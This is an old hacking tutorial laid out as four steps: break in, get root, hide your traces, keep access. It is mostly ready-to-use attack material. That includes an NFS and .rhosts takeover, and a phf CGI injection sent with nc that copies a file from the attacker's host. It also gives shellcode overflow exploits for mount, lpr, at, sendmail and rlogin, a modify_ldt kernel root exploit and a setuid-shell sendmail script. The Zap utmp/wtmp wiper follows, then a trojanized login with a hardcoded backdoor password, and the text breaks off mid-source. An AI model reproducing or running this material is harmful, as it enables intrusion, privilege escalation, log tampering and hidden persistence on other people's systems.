User's guide

                                    __________________________

 

Well, howdi folks... I guess you are all wondering who's this guy (me)

that's trying to show you a bit of everything... ?

Well, I ain't telling you anything of that...

Copyright, and other stuff like this (below).

 

Copyright and stuff...

______________________

 

If you feel offended by this subject (hacking) or you think that you could

do better, don't read the below information...

This file is for educational purposes ONLY...;)

I ain't responsible for any damages you made after reading this...(I'm very

serious...)

So this can be copied, but not modified (send me the changes, and if they

are good, I'll include them ).

Don't read it, 'cuz it might be illegal.

I warned you...

If you would like to continue, press <PgDown>.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

                                    Intro: Hacking step by step.

_________________________________________________________________________________

 

Well, this ain't exactely for begginers, but it'll have to do.

What all hackers has to know is that there are 4 steps in hacking...

 

Step 1: Getting access to site.

Step 2: Hacking r00t.

Step 3: Covering your traces.

Step 4: Keeping that account.

 

Ok. In the next pages we'll see exactely what I ment.

 

Step 1: Getting access.

_______

 

Well folks, there are several methods to get access to a site.

I'll try to explain the most used ones.

The first thing I do is see if the system has an export list:

 

mysite:~>/usr/sbin/showmount -e victim.site.com

RPC: Program not registered.

 

If it gives a message like this one, then it's time to search another way

in.

What I was trying to do was to exploit an old security problem by most

SUN OS's that could allow an remote attacker to add a .rhosts to a users

home directory... (That was possible if the site had mounted their home

directory.

Let's see what happens...

 

 

mysite:~>/usr/sbin/showmount -e victim1.site.com

/usr  victim2.site.com

/home (everyone)

/cdrom (everyone)

mysite:~>mkdir /tmp/mount

mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/

mysite:~>ls -sal /tmp/mount

   total 9

   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./

   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../

   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/

   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/

   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/

   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/

   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers

   1 drwx------   3 test     100          1024 Oct  8 21:05 test/

   1 drwx------  15 102      100          1024 Oct 20 18:57 rapper/

 

Well, we wanna hack into rapper's home.

mysite:~>id

uid=0 euid=0

mysite:~>whoami

root

mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

 

We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history  and you might

forget it on the remote server...

 

mysite:~>su - rapper

Welcome to rapper's user.

mysite:~>ls -lsa /tmp/mount/

   total 9

   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./

   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../

   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/

   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/

   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/

   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/

   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers

   1 drwx------   3 test     100          1024 Oct  8 21:05 test/

   1 drwx------  15 rapper   daemon       1024 Oct 20 18:57 rapper/

 

So we own this guy's home directory...

 

mysite:~>echo "+ +" > rapper/.rhosts

mysite:~>cd /

mysite:~>rlogin victim1.site.com

Welcome to Victim.Site.Com.

SunOs ver....(crap).

victim1:~$

 

This is the first method...

Another method could be to see if the site has an open 80 port. That would

mean that the site has a web page.

(And that's very bad, 'cuz it usually it's vulnerable).

Below I include the source of a scanner that helped me when NMAP wasn't written.

(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).

NMAP is a scanner that does even stealth scanning, so lots of systems won't

record it.

 

/* -*-C-*- tcpprobe.c */

/* tcpprobe - report on which tcp ports accept connections */

/* IO ERROR, error@axs.net, Sep 15, 1995 */

 

#include <stdio.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <errno.h>

#include <netdb.h>

#include <signal.h>

 

int main(int argc, char **argv)

{

  int probeport = 0;

  struct hostent *host;

  int err, i, net;

  struct sockaddr_in sa;

 

  if (argc != 2) {

    printf("Usage: %s hostname\n", argv[0]);

    exit(1);

  }

 

  for (i = 1; i < 1024; i++) {

    strncpy((char *)&sa, "", sizeof sa);

    sa.sin_family = AF_INET;

    if (isdigit(*argv[1]))

      sa.sin_addr.s_addr = inet_addr(argv[1]);

    else if ((host = gethostbyname(argv[1])) != 0)

      strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);

    else {

      herror(argv[1]);

      exit(2);

    }

    sa.sin_port = htons(i);

    net = socket(AF_INET, SOCK_STREAM, 0);

    if (net < 0) {

      perror("\nsocket");

      exit(2);

    }

    err = connect(net, (struct sockaddr *) &sa, sizeof sa);

    if (err < 0) {

      printf("%s %-5d %s\r", argv[1], i, strerror(errno));

      fflush(stdout);

    } else {

      printf("%s %-5d accepted.                               \n", argv[1], i);

      if (shutdown(net, 2) < 0) {

            perror("\nshutdown");

            exit(2);

      }

    }

    close(net);

  }

  printf("                                                                \r");

  fflush(stdout);

  return (0);

}

 

Well, now be very carefull with the below exploits, because they usually get

logged.

Besides, if you really wanna get a source file from /cgi-bin/ use this

sintax : lynx http://www.victim1.com//cgi-bin/finger

If you don't wanna do that, then do a :

 

mysite:~>echo "+ +" > /tmp/rhosts

 

mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+

/root/.rhosts" | nc -v - 20 victim1.site.com 80

 

then

mysite:~>rlogin -l root victim1.site.com

Welcome to Victim1.Site.Com.

victim1:~#

 

Or, maybe, just try to find out usernames and passwords...

The usual users are "test", "guest", and maybe the owner of the site...

I usually don't do such things, but you can...

 

Or if the site is really old, use that (quote site exec) old bug for

wu.ftpd.

There are  a lot of other exploits, like the remote exploits (innd, imap2,

pop3, etc...) that you can find at rootshell.connectnet.com or at

dhp.com/~fyodor.

 

Enough about this topic. (besides, if you can finger the site, you can

figgure out usernames and maybe by guessing passwords (sigh!) you could get

access to the site).

 

 

Step 2: Hacking r00t.

______

 

First you have to find the system it's running...

a). LINUX

ALL versions:

A big bug for all linux versions is mount/umount and (maybe) lpr.

 

/* Mount Exploit for Linux, Jul 30 1996

 

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::

:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::

::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::

::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::

::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::

:::::::...........:::...........:::...........::.......:......:.......::::::

:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

 

Discovered and Coded by Bloodmask & Vio

Covin Security 1996

*/

 

#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>

#include <sys/stat.h>

 

#define PATH_MOUNT "/bin/mount"

#define BUFFER_SIZE 1024

#define DEFAULT_OFFSET 50

 

u_long get_esp()

{

  __asm__("movl %esp, %eax");

 

}

 

main(int argc, char **argv)

{

  u_char execshell[] =

   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"

   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"

   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

 

   char *buff = NULL;

   unsigned long *addr_ptr = NULL;

   char *ptr = NULL;

 

   int i;

   int ofs = DEFAULT_OFFSET;

 

   buff = malloc(4096);

   if(!buff)

   {

      printf("can't allocate memory\n");

      exit(0);

   }

   ptr = buff;

 

   /* fill start of buffer with nops */

 

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));

   ptr += BUFFER_SIZE-strlen(execshell);

 

   /* stick asm code into the buffer */

 

   for(i=0;i < strlen(execshell);i++)

      *(ptr++) = execshell[i];

 

   addr_ptr = (long *)ptr;

   for(i=0;i < (8/4);i++)

      *(addr_ptr++) = get_esp() + ofs;

   ptr = (char *)addr_ptr;

   *ptr = 0;

 

   (void)alarm((u_int)0);

   printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");

   execl(PATH_MOUNT, "mount", buff, NULL);

}

 

/*LPR exploit:I don't know the author...*/

 

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

 

#define DEFAULT_OFFSET          50

#define BUFFER_SIZE             1023

 

long get_esp(void)

{

   __asm__("movl %esp,%eax\n");

}

 

void main()

{

   char *buff = NULL;

   unsigned long *addr_ptr = NULL;

   char *ptr = NULL;

 

   u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"

                        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"

                        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"

                        "\xd7\xff\xff\xff/bin/sh";

   int i;

 

   buff = malloc(4096);

   if(!buff)

   {

      printf("can't allocate memory\n");

      exit(0);

   }

   ptr = buff;

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));

   ptr += BUFFER_SIZE-strlen(execshell);

   for(i=0;i < strlen(execshell);i++)

      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;

   for(i=0;i<2;i++)

      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;

   ptr = (char *)addr_ptr;

   *ptr = 0;

   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);

}

 

 

b.) Version's 1.2.* to 1.3.2

NLSPATH env. variable exploit:

 

/* It's really annoying for users and good for me...

AT exploit gives only uid=0 and euid=your_usual_euid.

*/

#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>

#include <sys/stat.h>

 

#define path "/usr/bin/at"

#define BUFFER_SIZE 1024

#define DEFAULT_OFFSET 50

 

u_long get_esp()

{

  __asm__("movl %esp, %eax");

 

}

 

main(int argc, char **argv)

{

  u_char execshell[] =

   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"

   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"

   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

 

   char *buff = NULL;

   unsigned long *addr_ptr = NULL;

   char *ptr = NULL;

 

   int i;

   int ofs = DEFAULT_OFFSET;

 

   buff = malloc(4096);

   if(!buff)

   {

      printf("can't allocate memory\n");

      exit(0);

   }

   ptr = buff;

 

 

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));

   ptr += BUFFER_SIZE-strlen(execshell);

 

 

   for(i=0;i < strlen(execshell);i++)

      *(ptr++) = execshell[i];

 

   addr_ptr = (long *)ptr;

   for(i=0;i < (8/4);i++)

      *(addr_ptr++) = get_esp() + ofs;

   ptr = (char *)addr_ptr;

   *ptr = 0;

 

   (void)alarm((u_int)0);

   printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");

   setenv("NLSPATH",buff,1);

   execl(path, "at",NULL);

}

 

SENDMAIL exploit: (don't try to chmod a-s this one... :) )

 

/* SENDMAIL Exploit for Linux

*/

 

#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <fcntl.h>

#include <sys/stat.h>

 

#define path "/usr/bin/sendmail"

#define BUFFER_SIZE 1024

#define DEFAULT_OFFSET 50

 

u_long get_esp()

{

  __asm__("movl %esp, %eax");

 

}

 

main(int argc, char **argv)

{

  u_char execshell[] =

   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"

   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"

   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh";

 

   char *buff = NULL;

   unsigned long *addr_ptr = NULL;

   char *ptr = NULL;

 

   int i;

   int ofs = DEFAULT_OFFSET;

 

   buff = malloc(4096);

   if(!buff)

   {

      printf("can't allocate memory\n");

      exit(0);

   }

   ptr = buff;

 

 

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));

   ptr += BUFFER_SIZE-strlen(execshell);

 

 

   for(i=0;i < strlen(execshell);i++)

      *(ptr++) = execshell[i];

 

   addr_ptr = (long *)ptr;

   for(i=0;i < (8/4);i++)

      *(addr_ptr++) = get_esp() + ofs;

   ptr = (char *)addr_ptr;

   *ptr = 0;

 

   (void)alarm((u_int)0);

   printf("SENDMAIL exploit discovered by me, _PHANTOM_ in  1997\n");

   setenv("NLSPATH",buff,1);

   execl(path, "sendmail",NULL);

}

 

MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT)

!!!)

 

/* this is a hack of a hack.  a valid System.map was needed to get this

   sploit to werk.. but not any longer.. This sploit will give you root

   if the modify_ldt bug werks.. which I beleive it does in any kernel

   before 1.3.20 ..

  

   QuantumG

*/

 

/* original code written by Morten Welinder.

 *

 * this required 2 hacks to work on the 1.2.13 kernel that I've tested on:

 * 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed.

 * 2. the _task in the System.map file has no leading underscore.

 * I am not sure at what point these were changed, if you are

 * using this on a newer kernel compile with NEWERKERNEL defined.

 *                                          -ReD

 */

 

#include <linux/ldt.h>

#include <stdio.h>

#include <linux/unistd.h>

#include <signal.h>

#ifdef NEWERKERNEL

#include <asm/sigcontext.h>

#endif

#define __KERNEL__

#include <linux/sched.h>

#include <linux/module.h>

 

static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);

static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)

 

 

#define KERNEL_BASE 0xc0000000

/* ------------------------------------------------------------------------- */

static __inline__ unsigned char

__farpeek (int seg, unsigned ofs)

{

  unsigned char res;

  asm ("mov %w1,%%gs ; gs; movb (%2),%%al"

       : "=a" (res)

       : "r" (seg), "r" (ofs));

  return res;

}

/* ------------------------------------------------------------------------- */

static __inline__ void

__farpoke (int seg, unsigned ofs, unsigned char b)

{

  asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"

       : /* No results.  */

       : "r" (seg), "r" (ofs), "r" (b));

}

/* ------------------------------------------------------------------------- */

void

memgetseg (void *dst, int seg, const void *src, int size)

{

  while (size-- > 0)

    *(char *)dst++ = __farpeek (seg, (unsigned)(src++));

}

/* ------------------------------------------------------------------------- */

void

memputseg (int seg, void *dst, const void *src, int size)

{

  while (size-- > 0)

    __farpoke (seg, (unsigned)(dst++), *(char *)src++);

}

/* ------------------------------------------------------------------------- */

int

main ()

{

  int stat, i,j,k;

  struct modify_ldt_ldt_s ldt_entry;

  FILE *syms;

  char line[100];

  struct task_struct **task, *taskptr, thistask;

  struct kernel_sym blah[4096];

 

  printf ("Bogusity checker for modify_ldt system call.\n");

 

  printf ("Testing for page-size limit bug...\n");

  ldt_entry.entry_number = 0;

  ldt_entry.base_addr = 0xbfffffff;

  ldt_entry.limit = 0;

  ldt_entry.seg_32bit = 1;

  ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;

  ldt_entry.read_exec_only = 0;

  ldt_entry.limit_in_pages = 1;

  ldt_entry.seg_not_present = 0;

  stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));

  if (stat)

    /* Continue after reporting error.  */

    printf ("This bug has been fixed in your kernel.\n");

  else

    {

      printf ("Shit happens: ");

      printf ("0xc0000000 - 0xc0000ffe is accessible.\n");

    }

 

  printf ("Testing for expand-down limit bug...\n");

  ldt_entry.base_addr = 0x00000000;

  ldt_entry.limit = 1;

  ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;

  ldt_entry.limit_in_pages = 0;

  stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));

  if (stat)

    {

      printf ("This bug has been fixed in your kernel.\n");

      return 1;

    }

  else

    {

      printf ("Shit happens: ");

      printf ("0x00000000 - 0xfffffffd is accessible.\n");

    }

 

  i = get_kernel_syms(blah);

  k = i+10;

  for (j=0; j<i; j++)

   if (!strcmp(blah[j].name,"current") || !strcmp(blah[j].name,"_current")) k = j;

  if (k==i+10) { printf("current not found!!!\n"); return(1); }

  j=k;

 

  taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value);

  memgetseg (&taskptr, 7, taskptr, sizeof (taskptr)); 

  taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr);

  memgetseg (&thistask, 7, taskptr, sizeof (thistask)); 

  if (thistask.pid!=getpid()) { printf("current process not found\n"); return(1); }

  printf("Current process is %i\n",thistask.pid);

  taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr);

  memgetseg (&thistask, 7, taskptr, sizeof (thistask)); 

  if (thistask.pid!=getppid()) { printf("current process not found\n"); return(1); }

  printf("Parent process is %i\n",thistask.pid);

  thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0;

  thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0;

  memputseg (7, taskptr, &thistask, sizeof (thistask));

  printf ("Shit happens: parent process is now root process.\n");

  return 0;

};

 

c.) Other linux versions:

Sendmail exploit:

 

 

 

#/bin/sh

#

#

#                                   Hi !

#                This is exploit for sendmail smtpd bug

#    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).

#         This shell script does a root shell in /tmp directory.

#          If you have any problems with it, drop me a letter.

#                                Have fun !

#

#

#                           ----------------------

#               ---------------------------------------------

#    -----------------   Dedicated to my beautiful lady   ------------------

#               ---------------------------------------------

#                           ----------------------

#

#          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su

#

#

#

echo   'main()                                                '>>leshka.c

echo   '{                                                     '>>leshka.c

echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c

echo   '}                                                     '>>leshka.c

#

#

echo   'main()                                                '>>smtpd.c

echo   '{                                                     '>>smtpd.c

echo   '  setuid(0); setgid(0);                               '>>smtpd.c

echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c

echo   '}                                                     '>>smtpd.c

#

#

cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c

./leshka

kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`

rm leshka.c leshka smtpd.c /tmp/smtpd

echo "Now type:   /tmp/sh"

 

SUNOS:

Rlogin exploit:

(arghh!)

#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

#include <unistd.h>

 

#define BUF_LENGTH      8200

#define EXTRA           100

#define STACK_OFFSET    4000

#define SPARC_NOP       0xa61cc013

 

u_char sparc_shellcode[] =

"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"

"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"

"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"

"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"

"\x82\x10\x20\x3b\x91\xd4\xff\xff";

 

u_long get_sp(void)

{

  __asm__("mov %sp,%i0 \n");

}

 

void main(int argc, char *argv[])

{

  char buf[BUF_LENGTH + EXTRA];

  long targ_addr;

  u_long *long_p;

  u_char *char_p;

  int i, code_length = strlen(sparc_shellcode);

 

  long_p = (u_long *) buf;

 

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)

    *long_p++ = SPARC_NOP;

 

  char_p = (u_char *) long_p;

 

  for (i = 0; i < code_length; i++)

    *char_p++ = sparc_shellcode[i];

 

  long_p = (u_long *) char_p;

 

  targ_addr = get_sp() - STACK_OFFSET;

  for (i = 0; i < EXTRA / sizeof(u_long); i++)

    *long_p++ = targ_addr;

 

  printf("Jumping to address 0x%lx\n", targ_addr);

 

  execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);

  perror("execl failed");

}

 

Want more exploits? Get 'em from other sites (like rootshell,

dhp.com/~fyodor, etc...).

 

 

 

Step 3: Covering your tracks:

______

 

For this you could use lots of programs like zap, utclean, and lots of

others...

Watch out, ALWAYS after you cloaked yourself to see if it worked do a:

victim1:~$ who

...(crap)...

victim1:~$ finger

...;as;;sda...

victim1:~$w

...

 

If you are still not cloaked, look for wtmpx, utmpx and other stuff like

that. The only cloaker (that I know) that erased me even from wtmpx/utmpx

was utclean. But I don't have it right now, so ZAP'll have to do the job.

 

 

 

/*

      Title:  Zap.c (c) rokK Industries

   Sequence:  911204.B

 

    Syztems:  Kompiles on SunOS 4.+

       Note:  To mask yourself from lastlog and wtmp you need to be root,

              utmp is go+w on default SunOS, but is sometimes removed.

    Kompile:  cc -O Zap.c -o Zap

        Run:  Zap <Username>

 

       Desc:  Will Fill the Wtmp and Utmp Entries corresponding to the

              entered Username. It also Zeros out the last login data for

              the specific user, fingering that user will show 'Never Logged

              In'

 

      Usage:  If you cant find a usage for this, get a brain.

*/

 

#include <sys/types.h>

#include <stdio.h>

#include <unistd.h>

#include <fcntl.h>

#include <utmp.h>

#include <lastlog.h>

#include <pwd.h>

 

int f;

 

void kill_tmp(name,who)

char *name,

     *who;

{

    struct utmp utmp_ent;

 

  if ((f=open(name,O_RDWR))>=0) {

     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));

                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

                 write (f, &utmp_ent, sizeof (utmp_ent));

            }

     close(f);

  }

}

 

void kill_lastlog(who)

char *who;

{

    struct passwd *pwd;

    struct lastlog newll;

 

     if ((pwd=getpwnam(who))!=NULL) {

 

        if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {

            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

            bzero((char *)&newll,sizeof( newll ));

            write(f, (char *)&newll, sizeof( newll ));

            close(f);

        }

 

    } else printf("%s: ?\n",who);

}

 

main(argc,argv)

int  argc;

char *argv[];

{

    if (argc==2) {

        kill_tmp("/etc/utmp",argv[1]);

        kill_tmp("/usr/adm/wtmp",argv[1]);

        kill_lastlog(argv[1]);

        printf("Zap!\n");

    } else

    printf("Error.\n");

}

 

 

Step 4: Keeping that account.

_______

 

This usually means that you'll have to install some programs to give you

access even if the root has killed your account...

(DAEMONS!!!) =>|-@

 Here is an example of a login daemon from the DemonKit (good job,

fellows...)

LOOK OUT !!! If you decide to put a daemon, be carefull and modify it's date

of creation. (use touch --help to see how!)

 

 

/*

This is a simple trojanized login program, this was designed for Linux

and will not work without modification on linux. It lets you login as

either a root user, or any ordinary user by use of a 'magic password'.

It will also prevent the login from being logged into utmp, wtmp, etc.

You will effectively be invisible, and not be detected except via 'ps'.

*/

 

#define BACKDOOR                    "password"

int     krad=0;

 

 

 

/* This program is derived from 4.3 BSD software and is

   subject to the copyright notice below.

 

   The port to HP-UX has been motivated by the incapability

   of 'rlogin'/'rlogind' as per HP-UX 6.5 (and 7.0) to transfer window sizes.

 

   Changes:

 

   - General HP-UX portation. Use of facilities not available

     in HP-UX (e.g. setpriority) has been eliminated.

     Utmp/wtmp handling has been ported.

 

   - The program uses BSD command line options to be used

     in connection with e.g. 'rlogind' i.e. 'new login'.

 

   - HP features left out:          logging of bad login attempts in /etc/btmp,

                                                    they are sent to syslog

 

                                                    password expiry

 

                                                    '*' as login shell, add it if you need it

 

   - BSD features left out:         quota checks

                                                    password expiry

                                                    analysis of terminal type (tset feature)

 

   - BSD features thrown in:        Security logging to syslogd.

                                    This requires you to have a (ported) syslog

                                                    system -- 7.0 comes with syslog

                                                   

                                                    'Lastlog' feature.

 

   - A lot of nitty gritty details has been adjusted in favour of

     HP-UX, e.g. /etc/securetty, default paths and the environment

     variables assigned by 'login'.

 

   - We do *nothing* to setup/alter tty state, under HP-UX this is

     to be done by getty/rlogind/telnetd/some one else.

 

   Michael Glad (glad@daimi.dk)

   Computer Science Department

   Aarhus University

   Denmark

 

   1990-07-04

 

   1991-09-24 glad@daimi.aau.dk: HP-UX 8.0 port:

              - now explictly sets non-blocking mode on descriptors

                  - strcasecmp is now part of HP-UX

   1992-02-05 poe@daimi.aau.dk: Ported the stuff to Linux 0.12

   From 1992 till now (1995) this code for Linux has been maintained at

   ftp.daimi.aau.dk:/pub/linux/poe/

*/

  

/*

 * Copyright (c) 1980, 1987, 1988 The Regents of the University of California.

 * All rights reserved.

 *

 * Redistribution and use in source and binary forms are permitted

 * provided that the above copyright notice and this paragraph are

 * duplicated in all such forms and that any documentation,

 * advertising materials, and other materials related to such

 * distribution and use acknowledge that the software was developed

 * by the University of California, Berkeley.  The name of the

 * University may not be used to endorse or promote products derived

 * from this software without specific prior written permission.

 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR

 * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED

 * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.

 */

 

#ifndef lint

char copyright[] =

"@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n\

 All rights reserved.\n";

#endif /* not lint */

 

#ifndef lint

static char sccsid[] = "@(#)login.c            5.40 (Berkeley) 5/9/89";

#endif /* not lint */

 

/*

 * login [ name ]

 * login -h hostname            (for telnetd, etc.)

 * login -f name            (for pre-authenticated login: datakit, xterm, etc.)

 */

 

/* #define TESTING */

 

#ifdef TESTING

#include "param.h"

#else

#include <sys/param.h>

#endif

 

#include <ctype.h>

#include <unistd.h>

#include <getopt.h>

#include <memory.h>

#include <sys/stat.h>

#include <sys/time.h>

#include <sys/resource.h>

#include <sys/file.h>

#include <termios.h>

#include <string.h>

#define index strchr

#define rindex strrchr

#include <sys/ioctl.h>

#include <signal.h>

#include <errno.h>

#include <grp.h>

#include <pwd.h>

#include <setjmp.h>

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

#include <sys/syslog.h>

#include <sys/sysmacros.h>

#include <netdb.h>

 

#ifdef TESTING

#  include "utmp.h"

#else

#  include <utmp.h>

#endif

 

#ifdef SHADOW_PWD

#include <shadow.h>

#endif

 

#ifndef linux

#include <tzfile.h>

#include <lastlog.h>

#else

struct  lastlog

  { long ll_time;

    char ll_line[12];

    char ll_host[16];

  };

#endif

 

#include "pathnames.h"

 

#define P_(s) ()

void opentty P_((const char *tty));

void getloginname P_((void));

void timedout P_((void));

int rootterm P_((char *ttyn));

void motd P_((void));

void sigint P_((void));

void checknologin P_((void));

void dolastlog P_((int quiet));

void badlogin P_((char *name));

char *stypeof P_((char *ttyid));

void checktty P_((char *user, char *tty));

void getstr P_((char *buf, int cnt, char *err));

void sleepexit P_((int eval));

#undef P_

 

#ifdef            KERBEROS

#include <kerberos/krb.h>

#include <sys/termios.h>

char            realm[REALM_SZ];

int         kerror = KSUCCESS, notickets = 1;

#endif

 

#ifndef linux

#define            TTYGRPNAME            "tty"                  /* name of group to own ttys */

#else

#  define TTYGRPNAME      "other"

#  ifndef MAXPATHLEN

#    define MAXPATHLEN 1024

#  endif

#endif

 

/*

 * This bounds the time given to login.  Not a define so it can

 * be patched on machines where it's too small.

 */

#ifndef linux

int         timeout = 300;

#else

int     timeout = 60;

#endif

 

struct    passwd *pwd;

int         failures;

char            term[64], *hostname, *username, *tty;

 

char            thishost[100];

 

#ifndef linux

struct    sgttyb sgttyb;

struct    tchars tc = {

            CINTR, CQUIT, CSTART, CSTOP, CEOT, CBRK

};

struct    ltchars ltc = {

            CSUSP, CDSUSP, CRPRNT, CFLUSH, CWERASE, CLNEXT

};

#endif

 

char *months[] =

            { "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug",

              "Sep", "Oct", "Nov", "Dec" };

 

/* provided by Linus Torvalds 16-Feb-93 */

void

opentty(const char * tty)

{

    int i;

    int fd = open(tty, O_RDWR);

 

    for (i = 0 ; i < fd ; i++)

      close(i);

    for (i = 0 ; i < 3 ; i++)

      dup2(fd, i);

    if (fd >= 3)

      close(fd);

}

 

int

main(argc, argv)

            int argc;

            char **argv;

{

            extern int errno, optind;

            extern char *optarg, **environ;

            struct timeval tp;

            struct tm *ttp;

            struct group *gr;

            register int ch;

            register char *p;

            int ask, fflag, hflag, pflag, cnt;

            int quietlog, passwd_req, ioctlval;

            char *domain, *salt, *ttyn, *pp;

            char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10];

            char *ctime(), *ttyname(), *stypeof();

            time_t time();

            void timedout();

            char *termenv;        

 

#ifdef linux

            char tmp[100];

